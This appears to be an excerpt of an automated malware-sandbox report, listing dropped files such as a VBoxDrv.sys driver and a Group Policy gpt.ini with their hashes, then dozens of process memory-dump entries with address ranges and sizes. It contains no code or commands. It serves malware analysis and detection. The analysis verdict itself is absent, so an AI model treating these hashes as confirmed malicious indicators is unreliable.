SHA512ebff424004dccf67613e3caa5a04d6865f581125cec31539d86d9bc89e89a0571f979c1a877d651bbcb63aa4cc1c6569cc6af64d69dd0a9b0ddde28b0e24d878
-
C:\Windows\System32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sysFilesize
1013KB
MD5321ccdb9223b0801846b9ad131ac4d81
SHA1ac8fb0fc82a8c30b57962fe5d869fda534053404
SHA25605045c57480d3d5996e10a60393e799647c4ddaf6ede5f712d520c2a2841d43b
SHA51275b5cfd1dfe7da31f8988e2e76ca4ad21784acf9fc26a2593e567eb7e54036026c5249695614f8f1b53873fa9bf82e864b609d2f863717b8363189de7284754a
-
C:\Windows\System32\GroupPolicy\gpt.iniFilesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
\??\pipe\crashpad_4708_SVWHSNHVMPMBWFXTMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/368-174-0x0000020AA86C0000-0x0000020AA871C000-memory.dmp
Filesize: 368KB
-
memory/368-173-0x0000020AA8290000-0x0000020AA829A000-memory.dmp
Filesize: 40KB
-
memory/1456-1055-0x000000006B350000-0x000000006C5A4000-memory.dmp
Filesize: 18.3MB
-
memory/1876-215-0x00000000004F0000-0x0000000000502000-memory.dmp
Filesize: 72KB
-
memory/2004-4-0x00000000052D0000-0x00000000052D1000-memory.dmp
Filesize: 4KB
-
memory/2004-8-0x0000000005310000-0x0000000005311000-memory.dmp
Filesize: 4KB
-
memory/2004-9-0x0000000005340000-0x0000000005341000-memory.dmp
Filesize: 4KB
-
memory/2004-5-0x0000000005320000-0x0000000005321000-memory.dmp
Filesize: 4KB
-
memory/2004-6-0x00000000052B0000-0x00000000052B1000-memory.dmp
Filesize: 4KB
-
memory/2004-0-0x0000000000920000-0x0000000000DC3000-memory.dmp
Filesize: 4.6MB
-
memory/2004-23-0x0000000000920000-0x0000000000DC3000-memory.dmp
Filesize: 4.6MB
-
memory/2004-1-0x0000000077484000-0x0000000077486000-memory.dmp
Filesize: 8KB
-
memory/2004-2-0x00000000052E0000-0x00000000052E1000-memory.dmp
Filesize: 4KB
-
memory/2004-3-0x00000000052F0000-0x00000000052F1000-memory.dmp
Filesize: 4KB
-
memory/2004-7-0x00000000052C0000-0x00000000052C1000-memory.dmp
Filesize: 4KB
-
memory/2004-10-0x0000000005330000-0x0000000005331000-memory.dmp
Filesize: 4KB
-
memory/2264-51-0x0000000000DA0000-0x0000000001249000-memory.dmp
Filesize: 4.7MB
-
memory/2264-76-0x0000000000DA0000-0x0000000001249000-memory.dmp
Filesize: 4.7MB
-
memory/2264-49-0x0000000000DA0000-0x0000000001249000-memory.dmp
Filesize: 4.7MB
-
memory/2528-491-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp
Filesize: 2.0MB
-
memory/2528-490-0x000000006EA70000-0x000000006EBEB000-memory.dmp
Filesize: 1.5MB
-
memory/2528-675-0x000000006EA70000-0x000000006EBEB000-memory.dmp
Filesize: 1.5MB
-
memory/3036-823-0x00000000007B0000-0x0000000000D91000-memory.dmp
Filesize: 5.9MB
-
memory/3036-1021-0x00000000007B0000-0x0000000000D91000-memory.dmp
Filesize: 5.9MB
-
memory/3036-1180-0x00000000007B0000-0x0000000000D91000-memory.dmp
Filesize: 5.9MB
-
memory/3036-129-0x00000000007B0000-0x0000000000D91000-memory.dmp
Filesize: 5.9MB
-
memory/3036-599-0x00000000007B0000-0x0000000000D91000-memory.dmp
Filesize: 5.9MB
-
memory/3148-989-0x0000000010000000-0x00000000105E1000-memory.dmp
Filesize: 5.9MB
-
memory/3148-869-0x0000000000720000-0x0000000000D94000-memory.dmp
Filesize: 6.5MB
-
memory/3564-649-0x0000000000400000-0x0000000001A3D000-memory.dmp
Filesize: 22.2MB
-
memory/3572-79-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/3572-131-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/4016-822-0x0000000000FE0000-0x0000000001489000-memory.dmp
Filesize: 4.7MB
-
memory/4016-598-0x0000000000FE0000-0x0000000001489000-memory.dmp
Filesize: 4.7MB
-
memory/4016-82-0x0000000000FE0000-0x0000000001489000-memory.dmp
Filesize: 4.7MB
-
memory/4016-1094-0x0000000000FE0000-0x0000000001489000-memory.dmp
Filesize: 4.7MB
-
memory/4016-1020-0x0000000000FE0000-0x0000000001489000-memory.dmp
Filesize: 4.7MB
-
memory/4776-995-0x000001F538730000-0x000001F53873A000-memory.dmp
Filesize: 40KB
-
memory/4776-996-0x000001F5516E0000-0x000001F551792000-memory.dmp
Filesize: 712KB
-
memory/4776-972-0x000001F538750000-0x000001F538760000-memory.dmp
Filesize: 64KB
-
memory/4776-975-0x000001F5387F0000-0x000001F538814000-memory.dmp
Filesize: 144KB
-
memory/4776-971-0x000001F551490000-0x000001F5515A0000-memory.dmp
Filesize: 1.1MB
-
memory/4776-973-0x000001F538770000-0x000001F53877C000-memory.dmp
Filesize: 48KB
-
memory/4776-974-0x000001F538760000-0x000001F538774000-memory.dmp
Filesize: 80KB
-
memory/4776-997-0x000001F551450000-0x000001F55147A000-memory.dmp
Filesize: 168KB
-
memory/4776-956-0x000001F5331E0000-0x000001F536AD8000-memory.dmp
Filesize: 57.0MB
-
memory/5056-175-0x0000000000400000-0x0000000000408000-memory.dmp
Filesize: 32KB
-
memory/5064-621-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-28-0x0000000005350000-0x0000000005351000-memory.dmp
Filesize: 4KB
-
memory/5064-24-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-30-0x0000000005300000-0x0000000005301000-memory.dmp
Filesize: 4KB
-
memory/5064-29-0x00000000052F0000-0x00000000052F1000-memory.dmp
Filesize: 4KB
-
memory/5064-31-0x0000000005380000-0x0000000005381000-memory.dmp
Filesize: 4KB
-
memory/5064-128-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-25-0x0000000005320000-0x0000000005321000-memory.dmp
Filesize: 4KB
-
memory/5064-821-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-1179-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-27-0x0000000005310000-0x0000000005311000-memory.dmp
Filesize: 4KB
-
memory/5064-1019-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-204-0x0000000000590000-0x0000000000A33000-memory.dmp
Filesize: 4.6MB
-
memory/5064-32-0x0000000005370000-0x0000000005371000-memory.dmp
Filesize: 4KB
-
memory/5064-26-0x0000000005330000-0x0000000005331000-memory.dmp
Filesize: 4KB
-
memory/5156-508-0x0000000000400000-0x0000000001DFB000-memory.dmp
Filesize: 26.0MB
-
memory/5232-1052-0x0000000000400000-0x0000000001DFB000-memory.dmp
Filesize: 26.0MB
-
memory/5232-1022-0x0000000000400000-0x0000000001DFB000-memory.dmp
Filesize: 26.0MB
-
memory/5232-827-0x0000000000400000-0x0000000001DFB000-memory.dmp
Filesize: 26.0MB
-
memory/5268-689-0x000000006CF90000-0x000000006CFDC000-memory.dmp
Filesize: 304KB
-
memory/5268-643-0x0000000006550000-0x000000000659C000-memory.dmp
Filesize: 304KB
-
memory/5268-690-0x000000006D860000-0x000000006DBB4000-memory.dmp
Filesize: 3.3MB
-
memory/5268-601-0x0000000005F90000-0x00000000062E4000-memory.dmp
Filesize: 3.3MB
-
memory/5336-507-0x0000000000400000-0x0000000001DFB000-memory.dmp
Filesize: 26.0MB
-
memory/5364-641-0x000001EBECDB0000-0x000001EBECEFE000-memory.dmp
Filesize: 1.3MB
-
memory/5452-890-0x0000000006120000-0x0000000006134000-memory.dmp
Filesize: 80KB
-
memory/5452-849-0x000000006D860000-0x000000006DBB4000-memory.dmp
Filesize: 3.3MB
-
memory/5452-887-0x00000000078F0000-0x0000000007901000-memory.dmp
Filesize: 68KB
-
memory/5452-848-0x000000006EDE0000-0x000000006EE2C000-memory.dmp
Filesize: 304KB
-
memory/5488-677-0x000000006CF90000-0x000000006CFDC000-memory.dmp
Filesize: 304KB
-
memory/5488-688-0x0000000007A40000-0x0000000007AE3000-memory.dmp
Filesize: 652KB
-
memory/5488-678-0x000000006D860000-0x000000006DBB4000-memory.dmp
Filesize: 3.3MB
-
memory/5488-706-0x0000000007D40000-0x0000000007D51000-memory.dmp
Filesize: 68KB
-
memory/5488-717-0x0000000007D90000-0x0000000007DA4000-memory.dmp
Filesize: 80KB
-
memory/5496-977-0x000000006EA70000-0x000000006EBEB000-memory.dmp
Filesize: 1.5MB
-
memory/5496-718-0x00007FF9081D0000-0x00007FF9083C5000-memory.dmp
Filesize: 2.0MB
-
memory/5540-305-0x000000006EFA0000-0x000000006EFEC000-memory.dmp
Filesize: 304KB
-
memory/5540-250-0x0000000005260000-0x0000000005296000-memory.dmp
Filesize: 216KB
-
memory/5540-332-0x0000000007D60000-0x0000000007D71000-memory.dmp
Filesize: 68KB
-
memory/5540-330-0x0000000007BE0000-0x0000000007BEA000-memory.dmp
Filesize: 40KB
-
memory/5540-329-0x0000000007B70000-0x0000000007B8A000-memory.dmp
Filesize: 104KB
-
memory/5540-326-0x0000000006DF0000-0x0000000006E0E000-memory.dmp
Filesize: 120KB
-
memory/5540-307-0x000000006EBC0000-0x000000006EF14000-memory.dmp
Filesize: 3.3MB
-
memory/5540-274-0x0000000006220000-0x0000000006574000-memory.dmp
Filesize: 3.3MB
-
memory/5572-331-0x0000000007750000-0x00000000077E6000-memory.dmp
Filesize: 600KB
-
memory/5572-303-0x0000000007160000-0x0000000007192000-memory.dmp
Filesize: 200KB
-
memory/5572-283-0x0000000006680000-0x00000000066CC000-memory.dmp
Filesize: 304KB
-
memory/5572-349-0x00000000077F0000-0x000000000780A000-memory.dmp
Filesize: 104KB
-
memory/5572-280-0x0000000006120000-0x000000000613E000-memory.dmp
Filesize: 120KB
-
memory/5572-253-0x0000000005060000-0x0000000005082000-memory.dmp
Filesize: 136KB
-
memory/5572-306-0x000000006EBC0000-0x000000006EF14000-memory.dmp
Filesize: 3.3MB
-
memory/5572-350-0x0000000007730000-0x0000000007738000-memory.dmp
Filesize: 32KB
-
memory/5572-254-0x0000000005200000-0x0000000005266000-memory.dmp
Filesize: 408KB
-
memory/5572-327-0x00000000073C0000-0x0000000007463000-memory.dmp
Filesize: 652KB
-
memory/5572-304-0x000000006EFA0000-0x000000006EFEC000-memory.dmp
Filesize: 304KB
-
memory/5572-344-0x00000000076F0000-0x00000000076FE000-memory.dmp
Filesize: 56KB
-
memory/5572-328-0x0000000007B10000-0x000000000818A000-memory.dmp
Filesize: 6.5MB
-
memory/5572-255-0x0000000005F10000-0x0000000005F76000-memory.dmp
Filesize: 408KB
-
memory/5572-252-0x00000000052B0000-0x00000000058D8000-memory.dmp
Filesize: 6.2MB
-
memory/5572-347-0x0000000007700000-0x0000000007714000-memory.dmp
Filesize: 80KB
-
memory/5580-978-0x000000006EDE0000-0x000000006EE2C000-memory.dmp
Filesize:
304KB
-
memory/5580-979-0x000000006D860000-0x000000006DBB4000-memory.dmpFilesize
3.3MB
-
memory/5656-794-0x0000000005B70000-0x0000000005BBC000-memory.dmpFilesize
304KB
-
memory/5724-1012-0x0000000000400000-0x0000000001DFB000-memory.dmpFilesize
26.0MB
-
memory/5724-828-0x0000000000400000-0x0000000001DFB000-memory.dmpFilesize
26.0MB
-
memory/5804-334-0x000001F0CE380000-0x000001F0CE3A2000-memory.dmpFilesize
136KB
-
memory/5804-348-0x000001F0CE4B0000-0x000001F0CE5FE000-memory.dmpFilesize
1.3MB
-
memory/5836-510-0x000002167AA70000-0x000002167ABBE000-memory.dmpFilesize
1.3MB
-
memory/5876-394-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB
-
memory/5876-1079-0x0000000000400000-0x0000000001A19000-memory.dmpFilesize
22.1MB
-
memory/5876-859-0x0000000000400000-0x0000000001A19000-memory.dmpFilesize
22.1MB
-
memory/5876-825-0x0000000000400000-0x0000000001A19000-memory.dmpFilesize
22.1MB
-
memory/6024-295-0x0000000140000000-0x000000014072B000-memory.dmpFilesize
7.2MB
-
memory/6024-826-0x0000000140000000-0x000000014072B000-memory.dmpFilesize
7.2MB
-
memory/6148-619-0x0000000000720000-0x0000000000D94000-memory.dmpFilesize
6.5MB
-
memory/6148-719-0x0000000010000000-0x00000000105E1000-memory.dmpFilesize
5.9MB
-
memory/6272-928-0x0000000000400000-0x00000000008AD000-memory.dmpFilesize
4.7MB
-
memory/6272-829-0x0000000000400000-0x00000000008AD000-memory.dmpFilesize
4.7MB
-
memory/6420-737-0x000001ED78C50000-0x000001ED78C5A000-memory.dmpFilesize
40KB
-
memory/6420-753-0x000001ED78B00000-0x000001ED78C4E000-memory.dmpFilesize
1.3MB
-
memory/6420-736-0x000001ED78C70000-0x000001ED78C82000-memory.dmpFilesize
72KB
-
memory/6592-1151-0x000002C1E9B40000-0x000002C1E9C8E000-memory.dmpFilesize
1.3MB
-
memory/6632-959-0x000000006EDE0000-0x000000006EE2C000-memory.dmpFilesize
304KB
-
memory/6632-976-0x0000000005C00000-0x0000000005C11000-memory.dmpFilesize
68KB
-
memory/6632-960-0x000000006D860000-0x000000006DBB4000-memory.dmpFilesize
3.3MB
-
memory/6632-992-0x0000000005C40000-0x0000000005C54000-memory.dmpFilesize
80KB
-
memory/6632-970-0x0000000007040000-0x00000000070E3000-memory.dmpFilesize
652KB
-
memory/6632-726-0x0000017EFEEE0000-0x0000017EFF02E000-memory.dmpFilesize
1.3MB
-
memory/6736-752-0x00000000077B0000-0x00000000077D2000-memory.dmpFilesize
136KB
-
memory/6736-754-0x0000000007E70000-0x0000000008414000-memory.dmpFilesize
5.6MB
-
memory/6764-838-0x000000006D860000-0x000000006DBB4000-memory.dmpFilesize
3.3MB
-
memory/6764-837-0x000000006EDE0000-0x000000006EE2C000-memory.dmpFilesize
304KB